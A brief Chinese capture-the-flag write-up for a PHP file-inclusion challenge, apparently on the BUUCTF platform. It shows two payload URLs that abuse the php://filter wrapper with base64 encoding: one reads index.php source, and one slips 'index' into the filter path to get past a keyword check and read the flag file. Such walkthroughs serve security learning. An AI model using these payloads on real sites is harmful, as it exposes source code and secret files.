随便点一下
猜测sql注入,报错显示include(),是文件包含
http://d5fd4aa8-7ea1-4fc3-ae53-d3f1ea84d5d0.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index
读取index
文件必须包含woofers
或者meowers
或者index
,直接在伪协议上在加一层协议,读取flag
http://d5fd4aa8-7ea1-4fc3-ae53-d3f1ea84d5d0.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag
暂无评论